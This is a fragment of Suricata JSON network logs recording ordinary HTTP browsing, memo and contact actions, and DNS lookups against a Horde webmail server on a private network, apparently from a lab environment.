Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071}} {"timestamp":"2020-02-29T00:18:56.301097+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34876,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} 
{"timestamp":"2020-02-29T00:18:58.000810+0000","flow_id":1485649266158063,"event_type":"flow","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:57.600559+0000","end":"2020-02-29T00:13:57.709068+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:00.241682+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38215,"tx_id":0}} {"timestamp":"2020-02-29T00:19:00.250216+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55762,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:00.445730+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984}} {"timestamp":"2020-02-29T00:19:03.000378+0000","event_type":"stats","stats":{"uptime":14795,"capture":{"kernel_packets":136608,"kernel_drops":0},"decoder":{"pkts":136618,"bytes":93839609,"invalid":192,"ipv4":135083,"ipv6":10,"ethernet":136618,"raw":0,"null":0,"sll":0,"tcp":129642,"udp":5234,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2813,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2829,"synack":2820,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly
_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1850,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2396,"failed_udp":112},"tx":{"http":4722,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2476}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2454,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18850,"memcap_state":0,"memcap_global":0},"http":{"memuse":52604,"memcap":0}}} {"timestamp":"2020-02-29T00:19:03.009191+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} {"timestamp":"2020-02-29T00:19:03.020774+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:03.235603+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896}} {"timestamp":"2020-02-29T00:19:05.000328+0000","flow_id":880338066172632,"event_type":"flow","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6726,"start":"2020-02-29T00:17:59.486104+0000","end":"2020-02-29T00:18:04.703495+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:05.227899+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:19:06.004062+0000","flow_id":390853513012744,"event_type":"flow","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:05.878088+0000","end":"2020-02-29T00:14:05.986371+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:06.940891+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":24479,"tx_id":2}} {"timestamp":"2020-02-29T00:19:06.949852+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:07.518601+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686}} {"timestamp":"2020-02-29T00:19:08.001030+0000","flow_id":779573836303470,"event_type":"flow","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":2187,"bytes_toclient":13917,"start":"2020-02-29T00:17:26.380014+0000","end":"2020-02-29T00:18:07.306799+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:19:09.000565+0000","flow_id":2196762722510294,"event_type":"flow","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1217,"bytes_toclient":8358,"start":"2020-02-29T00:18:03.337366+0000","end":"2020-02-29T00:18:08.631591+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:10.000202+0000","event_type":"stats","stats":{"uptime":14802,"capture":{"kernel_packets":136642,"kernel_drops":0},"decoder":{"pkts":136671,"bytes":93872046,"invalid":192,"ipv4":135136,"ipv6":10,"ethernet":136671,"raw":0,"null":0,"sll":0,"tcp":129689,"udp":5240,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2814,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2830,"synack":2821,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1851,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2399,"failed_udp":112},"tx":{"http":4725,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2479}},"flow_mgr":{"closed_pruned":2796,"new_pruned":17,"est_pruned":2455,"b
ypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":192948,"memcap":0}}} {"timestamp":"2020-02-29T00:19:10.358985+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34880,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.635244+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30835,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":221,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.823800+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60096,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:12.005216+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166}} {"timestamp":"2020-02-29T00:19:12.518903+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} 
{"timestamp":"2020-02-29T00:19:16.000180+0000","flow_id":1132834899264066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5842,"start":"2020-02-29T00:18:10.754242+0000","end":"2020-02-29T00:18:15.965476+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:17.000278+0000","event_type":"stats","stats":{"uptime":14809,"capture":{"kernel_packets":136693,"kernel_drops":0},"decoder":{"pkts":136697,"bytes":93881203,"invalid":192,"ipv4":135160,"ipv6":10,"ethernet":136697,"raw":0,"null":0,"sll":0,"tcp":129709,"udp":5244,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2815,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2831,"synack":2822,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1852,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2401,"failed_udp":112},"tx":{"http":4727,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2481}},"flow_mgr":{"closed_pruned":2797,"new_pruned":17,"est_pruned":2455,"byp
assed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":188756,"memcap":0}}} {"timestamp":"2020-02-29T00:19:17.000992+0000","flow_id":588464974095740,"event_type":"flow","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2873,"bytes_toclient":7803,"start":"2020-02-29T00:18:06.812412+0000","end":"2020-02-29T00:18:16.581516+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:17.006111+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34882,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":23270,"tx_id":1}} {"timestamp":"2020-02-29T00:19:17.310431+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} 